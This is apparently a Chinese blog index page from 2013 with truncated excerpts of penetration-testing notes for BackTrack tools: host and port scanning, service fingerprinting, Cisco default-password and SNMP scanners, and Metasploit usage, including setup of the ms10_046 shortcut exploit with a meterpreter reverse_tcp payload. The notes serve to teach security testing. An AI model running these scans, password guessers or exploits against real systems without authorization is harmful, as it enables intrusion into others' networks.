2013年12月5日
摘要: tcptraceroute通过发送TCP/SYN数据包来代替UDP或ICMP应答数据包,可以穿透大多数防火墙tcptraceroute 域名tcptraceroute -q 1 -n 域名netenumroot@bt:/pentest/enumeration/irpas# ./netenum 192.168.1.0/24 3 1//扫描目标网段的存活主机,速度快... 阅读全文
posted @ 2013-12-05 00:59 寻步 阅读(2025) 评论(0) 推荐(0) 编辑
  2013年12月3日
摘要: ms10_046_shortcut_icon_dllloader漏洞利用过程msf > use exploit/windows/browser/ms10_046_shortcut_icon_dllloadermsf exploit(ms10_046_shortcut_icon_dllloader) > set PAYLOAD windows/meterpreter/reverse_tcpmsf exploit(ms10_046_shortcut_icon_dllloader) > set SRVHOST 192.168.1.107msf exploit(ms10_046_sh 阅读全文
posted @ 2013-12-03 01:19 寻步 阅读(1503) 评论(0) 推荐(1) 编辑
  2013年11月30日
摘要: 从小到大听说了无数关于“电脑黑客”的故事,比如XXX入侵美国五角大楼,再比如前几年的“熊猫烧香”病毒,这些故事的主角都被我们的媒体称之为 “黑客”。其实这些人,更大程度上应该被称之为“cracker(骇客)”,而不是 “hacker(黑客)”,很多媒体和作家实在是侮辱了hacker 。cracker 阅读全文
posted @ 2013-11-30 23:52 寻步 阅读(634) 评论(0) 推荐(0) 编辑
  2013年11月29日
摘要: msf > search -r great -t exploits search命令查找rank为great的exploitmsf > setg RHOST 192.168.1.102 一个值赋给全局变量,这样在使用其他模块时,RHOST也同时被设定。uset usetg 解除变量msf >info exploit/windows/smb/ms08_067_netapi 查看漏洞利用详细信息 阅读全文
posted @ 2013-11-29 23:27 寻步 阅读(391) 评论(0) 推荐(0) 编辑
摘要: root@bt:~# cd /etc/sshroot@bt:/etc/ssh# sshd-generate Generating public/private rsa1 key pair.Your identification has been saved in /etc/ssh/ssh_host_key.Your public key has been saved in /etc/ssh/ssh_host_key.pub.The key fingerprint is:fb:10:bb:82:1d:4e:5d:63:50:49:01:f5:70:f1:ad:80 root@btThe key& 阅读全文
posted @ 2013-11-29 23:13 寻步 阅读(250) 评论(0) 推荐(0) 编辑
摘要: root@bt:~# nc -v -n -z 192.168.1.102 1-1024 端口扫描 阅读全文
posted @ 2013-11-29 00:44 寻步 阅读(184) 评论(0) 推荐(0) 编辑
  2013年11月27日
摘要: cisco工具:root@bt:/pentest/cisco/cisco-auditing-tool# ./CAT -h 192.168.1.102 -w lists/community -a lists/passwords -iroot@bt:/pentest/cisco/ciscos# ./ciscos 192.168.1.0 3 -t 4 -C 10 cisco password scanner 用于扫描网段中cisco默认的密码,速度很快。snmp工具:root@bt:/pentest/enumeration/snmp/admsnmp# ./ADMsnmp 192.168.1.102. 阅读全文
posted @ 2013-11-27 21:23 寻步 阅读(361) 评论(0) 推荐(0) 编辑
摘要: root@bt:~# ike-scan -M -v 192.168.1.102root@bt:~# sslscan 192.168.1.102 阅读全文
posted @ 2013-11-27 20:46 寻步 阅读(79) 评论(0) 推荐(0) 编辑
摘要: root@bt:~# amap -bq 192.168.1.102 80 探测目标主机目标端口的具体服务root@bt:/pentest/scanners/httsquash# ./httsquash -r 192.168.1.102 查看目标主机信息httprint 阅读全文
posted @ 2013-11-27 02:33 寻步 阅读(292) 评论(0) 推荐(0) 编辑
摘要: autoscan 图形化界面netifear 图形化界面查看网段主机、服务等root@bt:~# nmap -v -v -sP 192.168.1.1/24 查看活动主机root@bt:~# nmap -v -n -A 192.168.1.102 查看目标主机开启的服务 阅读全文
posted @ 2013-11-27 02:06 寻步 阅读(135) 评论(0) 推荐(0) 编辑